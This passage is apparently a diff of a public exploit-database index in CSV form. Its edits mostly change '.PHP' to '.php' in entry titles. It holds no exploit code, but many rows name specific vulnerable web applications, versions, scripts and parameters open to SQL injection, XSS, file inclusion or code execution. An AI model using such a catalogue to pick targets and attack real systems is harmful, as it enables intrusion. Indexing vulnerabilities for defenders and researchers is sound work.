26437,platforms/php/webapps/26437.txt,"PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access Vulnerability",2005-10-29,Zeelock,php,webapps,0 -26438,platforms/php/webapps/26438.txt,"Invision Gallery 2.0.3 Index.PHP SQL Injection Vulnerability",2005-10-31,almaster,php,webapps,0 +26438,platforms/php/webapps/26438.txt,"Invision Gallery 2.0.3 Index.php SQL Injection Vulnerability",2005-10-31,almaster,php,webapps,0 26439,platforms/asp/webapps/26439.txt,"Snitz Forum 2000 Post.ASP Cross-Site Scripting Vulnerability",2005-10-31,h4xorcrew,asp,webapps,0 -26440,platforms/php/webapps/26440.txt,"PHPCafe Tutorial Manager Index.PHP SQL Injection Vulnerability",2005-10-31,almaster,php,webapps,0 -26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 Forum.PHP Multiple SQL Injection Vulnerabilities",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 +26440,platforms/php/webapps/26440.txt,"PHPCafe Tutorial Manager Index.php SQL Injection Vulnerability",2005-10-31,almaster,php,webapps,0 +26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 Forum.php Multiple SQL Injection Vulnerabilities",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 26442,platforms/php/webapps/26442.txt,"PHP 4.x PHPInfo Cross-Site Scripting Vulnerability",2005-10-31,"Stefan Esser",php,webapps,0 26443,platforms/php/remote/26443.php,"PHP 4.x/5.0.x File Upload GLOBAL Variable Overwrite Vulnerability",2005-10-31,rgod,php,remote,0 26444,platforms/asp/webapps/26444.txt,"Comersus BackOffice 4.x/5.0/6.0 comersus_backoffice_supportError.asp error Parameter XSS",2005-10-31,_6mO_HaCk,asp,webapps,0 26445,platforms/asp/webapps/26445.pl,"Comersus BackOffice 4.x/5.0/6.0 /comersus/database/comersus.mdb Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 -26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 Addrbook.PHP SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0 +26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 Addrbook.php SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 HTML Injection Vulnerability",2005-11-01,gladiator,php,webapps,0 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - (.lst) Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection Vulnerability",2013-06-26,"Life Wasted",php,webapps,0 @@ -23577,11 +23577,11 @@ id,file,description,date,author,platform,type,port 26452,platforms/win32/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win32,local,0 26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0 -26455,platforms/php/webapps/26455.txt,"VUBB Index.PHP Cross-Site Scripting Vulnerability",2005-11-01,"Alireza Hassani",php,webapps,0 -26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.PHP SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0 +26455,platforms/php/webapps/26455.txt,"VUBB Index.php Cross-Site Scripting Vulnerability",2005-11-01,"Alireza Hassani",php,webapps,0 +26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.php SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0 26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2005-11-01,ad@class101.org,windows,dos,0 -26458,platforms/php/webapps/26458.txt,"News2Net 3.0 Index.PHP SQL Injection Vulnerability",2005-11-02,Mousehack,php,webapps,0 -26459,platforms/php/webapps/26459.txt,"phpWebThings 0.4.4 Forum.PHP Cross-Site Scripting Vulnerability",2005-11-02,Linux_Drox,php,webapps,0 +26458,platforms/php/webapps/26458.txt,"News2Net 3.0 Index.php SQL Injection Vulnerability",2005-11-02,Mousehack,php,webapps,0 +26459,platforms/php/webapps/26459.txt,"phpWebThings 0.4.4 Forum.php Cross-Site Scripting Vulnerability",2005-11-02,Linux_Drox,php,webapps,0 26460,platforms/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 Web Server Authentication Buffer Overflow Vulnerability",2005-11-02,"Luigi Auriemma",windows,remote,0 26461,platforms/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 preview_cgi.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 preview_static_cgi.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 @@ -23589,8 +23589,8 @@ id,file,description,date,author,platform,type,port 26464,platforms/windows/remote/26464.txt,"IPSwitch WhatsUp Small Business 2004 Report Service Directory Traversal Vulnerability",2005-11-03,"Dennis Rand",windows,remote,0 26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 show_archives.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 show_news.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 -26467,platforms/php/webapps/26467.txt,"PHP Handicapper Process_signup.PHP HTTP Response Splitting Vulnerability",2005-11-03,BiPi_HaCk,php,webapps,0 -26468,platforms/php/webapps/26468.pl,"Galerie 2.4 ShowGallery.PHP SQL Injection Vulnerability",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 +26467,platforms/php/webapps/26467.txt,"PHP Handicapper Process_signup.php HTTP Response Splitting Vulnerability",2005-11-03,BiPi_HaCk,php,webapps,0 +26468,platforms/php/webapps/26468.pl,"Galerie 2.4 ShowGallery.php SQL Injection Vulnerability",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26471,platforms/windows/remote/26471.py,"PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit",2013-06-27,"Jacob Holcomb",windows,remote,21 @@ -23598,10 +23598,10 @@ id,file,description,date,author,platform,type,port 26474,platforms/php/webapps/26474.txt,"PHPFM Arbitrary File Upload Vulnerability",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail Unauthorized Access Vulnerability",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Include Vulnerability",2005-11-07,khc@bsdmail.org,php,webapps,0 -26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 U2U.PHP Cross-Site Scripting Vulnerability",2005-11-07,"HACKERS PAL",php,webapps,0 +26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 U2U.php Cross-Site Scripting Vulnerability",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 admin.php Multiple Parameter XSS",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 Advance Program Control Bypass Weakness",2005-11-07,Tr0y-x,windows,local,0 -26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 Admin.PHP Directory Traversal Vulnerability",2005-11-07,"Bernhard Mueller",php,webapps,0 +26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 Admin.php Directory Traversal Vulnerability",2005-11-07,"Bernhard Mueller",php,webapps,0 26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x /admin/eventlog.php Multiple Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 @@ -23611,7 +23611,7 @@ id,file,description,date,author,platform,type,port 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability",2005-11-09,"Leandro Meiners",php,webapps,0 26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,dos,0 -26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",php,webapps,0 +26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 Tiki-view_forum_thread.php Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",php,webapps,0 26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",windows,remote,0 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution Vulnerability",2002-12-31,"Georgi Guninski",linux,local,0 26493,platforms/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer OverFlow",2013-06-30,"Mohamed Clay",windows,remote,0 @@ -23621,23 +23621,23 @@ id,file,description,date,author,platform,type,port 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer RM File Remote Stack Based Buffer Overflow Vulnerability",2005-11-10,nolimit,windows,remote,0 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 -26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0 +26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.php File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection Vulnerability",2005-11-12,bhs_team,php,webapps,0 -26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 Module.PHP Local File Include Vulnerability",2005-11-14,"HACKERS PAL",php,webapps,0 +26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 Module.php Local File Include Vulnerability",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum ForumReply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 -26505,platforms/php/webapps/26505.txt,"Codegrrl Protection.PHP Unspecified Code Execution Vulnerability",2005-11-14,"Robin Verton",php,webapps,0 +26505,platforms/php/webapps/26505.txt,"Codegrrl Protection.php Unspecified Code Execution Vulnerability",2005-11-14,"Robin Verton",php,webapps,0 26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 ts.exe tsurl Variable Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 ts.exe sug Parameter XSS",2005-11-15,"Rafi Nahum",cgi,webapps,0 26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 ts.exe sug Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 Index.PHP Multiple SQL Injection Vulnerabilities",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 -26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 Index.PHP Local File Include Vulnerability",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 +26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 Index.php Multiple SQL Injection Vulnerabilities",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 +26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 Index.php Local File Include Vulnerability",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26512,platforms/php/webapps/26512.txt,"phpwcms 1.2.5 -DEV - login.php form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"phpwcms 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Include Vulnerability",2005-11-15,"Robin Verton",php,webapps,0 -26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.PHP Cross-Site Scripting Vulnerability",2005-11-15,trueend5,php,webapps,0 +26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.php Cross-Site Scripting Vulnerability",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft Office PowerPoint 2007 - Crash PoC",2013-07-01,Asesino04,windows,dos,0 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 design.php delete Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 @@ -23660,17 +23660,17 @@ id,file,description,date,author,platform,type,port 26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal Vulnerability",2005-11-17,FistFuXXer,linux,remote,0 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability",2005-11-17,ConcorDHacK,asp,webapps,0 26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 Options.php and Viewforum.php SQL Injection Vulnerabilities",2005-11-19,"Robin Verton",php,webapps,0 -26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 Popup.PHP Cross-Site Scripting Vulnerability",2005-11-21,[GB],php,webapps,0 +26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 Popup.php Cross-Site Scripting Vulnerability",2005-11-21,[GB],php,webapps,0 26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 SVG Image Buffer Overflow Vulnerability",2005-11-21,"Joxean Koret",linux,remote,0 -26541,platforms/php/webapps/26541.txt,"SimplePoll Results.PHP SQL Injection Vulnerability",2005-11-21,stranger-killer,php,webapps,0 +26541,platforms/php/webapps/26541.txt,"SimplePoll Results.php SQL Injection Vulnerability",2005-11-21,stranger-killer,php,webapps,0 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability",2005-11-21,"Irene Abezgauz",multiple,remote,0 -26543,platforms/php/webapps/26543.txt,"APBoard Thread.PHP SQL Injection Vulnerability",2005-11-21,ksa_ksa82,php,webapps,0 -26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x Files.PHP SQL Injection Vulnerability",2005-11-21,ksa_ksa82,php,webapps,0 +26543,platforms/php/webapps/26543.txt,"APBoard Thread.php SQL Injection Vulnerability",2005-11-21,ksa_ksa82,php,webapps,0 +26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x Files.php SQL Injection Vulnerability",2005-11-21,ksa_ksa82,php,webapps,0 26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x Search Module SQL Injection Vulnerability",2005-11-21,Lostmon,php,webapps,0 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 profile.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0 26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service Vulnerability",2005-11-22,"Janis Vizulis",hardware,dos,0 -26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.PHP Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0 +26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.php Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0 26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0 @@ -23682,13 +23682,13 @@ id,file,description,date,author,platform,type,port 26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack-based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 Error Message Cross-Site Scripting Vulnerability",2005-11-22,"Moritz Naumann",php,webapps,0 26560,platforms/php/webapps/26560.txt,"PmWiki 2.0.x Search Cross-Site Scripting Vulnerability",2005-11-22,"Moritz Naumann",php,webapps,0 -26561,platforms/php/webapps/26561.txt,"1-2-3 Music Store 1.0 Process.PHP SQL Injection Vulnerability",2005-11-23,r0t,php,webapps,0 +26561,platforms/php/webapps/26561.txt,"1-2-3 Music Store 1.0 Process.php SQL Injection Vulnerability",2005-11-23,r0t,php,webapps,0 26562,platforms/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 SubCategory.php cl Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26563,platforms/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 ItemInfo.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26564,platforms/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 ItemReview.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26565,platforms/php/webapps/26565.txt,"Tunez 1.21 songinfo.php song_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26566,platforms/php/webapps/26566.txt,"Tunez 1.21 - search.php searchFor Parameter XSS",2005-11-23,r0t3d3Vil,php,webapps,0 -26567,platforms/php/webapps/26567.txt,"WSN Forum 1.21 Memberlist.PHP SQL Injection Vulnerability",2005-11-23,r0t,php,webapps,0 +26567,platforms/php/webapps/26567.txt,"WSN Forum 1.21 Memberlist.php SQL Injection Vulnerability",2005-11-23,r0t,php,webapps,0 26568,platforms/php/webapps/26568.txt,"OmnistarLive 5.2 - Multiple SQL Injection Vulnerabilities",2005-11-23,r0t,php,webapps,0 26569,platforms/php/webapps/26569.txt,"PHP Labs Survey Wizard SQL Injection Vulnerability",2005-11-23,r0t,php,webapps,0 26570,platforms/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection Vulnerability",2005-11-23,r0t3d3Vil,php,webapps,0 @@ -23708,8 +23708,8 @@ id,file,description,date,author,platform,type,port 26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module record Parameter XSS",2005-11-24,"Christopher Kunz",php,webapps,0 26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 RSS Aggregation Module Feed XSS",2005-11-24,"Christopher Kunz",php,webapps,0 26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 -26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 Index.PHP SQL Injection Vulnerability",2005-11-24,r0t,php,webapps,0 -26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 Forum.PHP SQL Injection Vulnerability",2005-11-24,r0t3d3Vil,php,webapps,0 +26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 Index.php SQL Injection Vulnerability",2005-11-24,r0t,php,webapps,0 +26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 Forum.php SQL Injection Vulnerability",2005-11-24,r0t3d3Vil,php,webapps,0 26589,platforms/php/webapps/26589.txt,"OvBB 0.x thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26590,platforms/php/webapps/26590.txt,"OvBB 0.x profile.php userid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 titles.php let Parameter XSS",2005-11-25,retrogod@aliceposta.it,php,webapps,0 @@ -23766,28 +23766,28 @@ id,file,description,date,author,platform,type,port 26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Include Vulnerability",2005-11-28,r0t,php,webapps,0 26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 - Multiple Products Cross-Site Scripting Vulnerabilities",2005-11-28,r0t,php,webapps,0 26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 Default.ASP SQL Injection Vulnerability",2005-11-29,info@hoder.com,php,webapps,0 -26646,platforms/php/webapps/26646.txt,"PHP Upload Center Index.PHP Directory Traversal Vulnerability",2005-11-29,liz0,php,webapps,0 -26647,platforms/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 News.PHP SQL Injection Vulnerability",2005-11-29,r0t3d3Vil,php,webapps,0 +26646,platforms/php/webapps/26646.txt,"PHP Upload Center Index.php Directory Traversal Vulnerability",2005-11-29,liz0,php,webapps,0 +26647,platforms/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 News.php SQL Injection Vulnerability",2005-11-29,r0t3d3Vil,php,webapps,0 26648,platforms/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service Vulnerability",2005-11-29,"Avi Kivity",linux,dos,0 26649,platforms/php/webapps/26649.txt,"DMANews 0.9 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 26650,platforms/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 26651,platforms/php/webapps/26651.txt,"BosDates 4.0 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 -26652,platforms/php/webapps/26652.txt,"Post Affiliate Pro 2.0.4 Index.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 -26653,platforms/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - Search.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26652,platforms/php/webapps/26652.txt,"Post Affiliate Pro 2.0.4 Index.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26653,platforms/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - Search.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 26654,platforms/php/webapps/26654.txt,"KBase Express 1.0 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 -26655,platforms/php/webapps/26655.txt,"ltwCalendar 4.1.3 Calendar.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 -26656,platforms/php/webapps/26656.txt,"Orca Knowledgebase 2.1 Knowledgebase.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 -26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 Blog.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 -26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 Ringmaker.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26655,platforms/php/webapps/26655.txt,"ltwCalendar 4.1.3 Calendar.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26656,platforms/php/webapps/26656.txt,"Orca Knowledgebase 2.1 Knowledgebase.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 Blog.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 Ringmaker.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 26659,platforms/php/webapps/26659.txt,"FAQ System 1.1 viewFAQ.php Multiple Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 index.php CATEGORY_ID Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 -26661,platforms/php/webapps/26661.txt,"Survey System 1.1 Survey.PHP SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 +26661,platforms/php/webapps/26661.txt,"Survey System 1.1 Survey.php SQL Injection Vulnerability",2005-11-29,r0t,php,webapps,0 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection Vulnerability",2005-11-29,KingOfSka,php,webapps,0 26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 26664,platforms/hardware/webapps/26664.txt,"Multiple D-Link Devices - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps,0 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service Vulnerability",2006-01-17,"David Maciejak",windows,dos,0 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service Vulnerability",2005-11-29,"Wernfried Haas",linux,dos,0 -26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 Index.PHP SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 +26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 Index.php SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Include Vulnerability",2005-11-30,r0t3d3Vil,php,webapps,0 26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 buyoffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 @@ -23798,26 +23798,26 @@ id,file,description,date,author,platform,type,port 26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 refer_friend.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 print_article.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26677,platforms/php/webapps/26677.txt,"SoftBiz FAQ 1.1 add_comment.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26678,platforms/php/webapps/26678.txt,"FAQRing 3.0 Answer.PHP SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 +26678,platforms/php/webapps/26678.txt,"FAQRing 3.0 Answer.php SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 26679,platforms/php/webapps/26679.txt,"WSN Knowledge Base 1.2 index.php Multiple Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26680,platforms/php/webapps/26680.txt,"WSN Knowledge Base 1.2 comments.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26681,platforms/php/webapps/26681.txt,"WSN Knowledge Base 1.2 memberlist.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26682,platforms/php/webapps/26682.txt,"OpenNetAdmin 13.03.01 - Remote Code Execution",2013-07-07,Mandat0ry,php,webapps,0 -26683,platforms/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 Nikki.PHP SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 -26684,platforms/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 Index.PHP SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 +26683,platforms/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 Nikki.php SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 +26684,platforms/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 Index.php SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 26685,platforms/php/webapps/26685.txt,"Instant Photo Gallery 1.0 portfolio.php cat_id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26686,platforms/php/webapps/26686.txt,"Instant Photo Gallery 1.0 content.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injection Vulnerabilities",2005-12-01,lwang,php,webapps,0 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 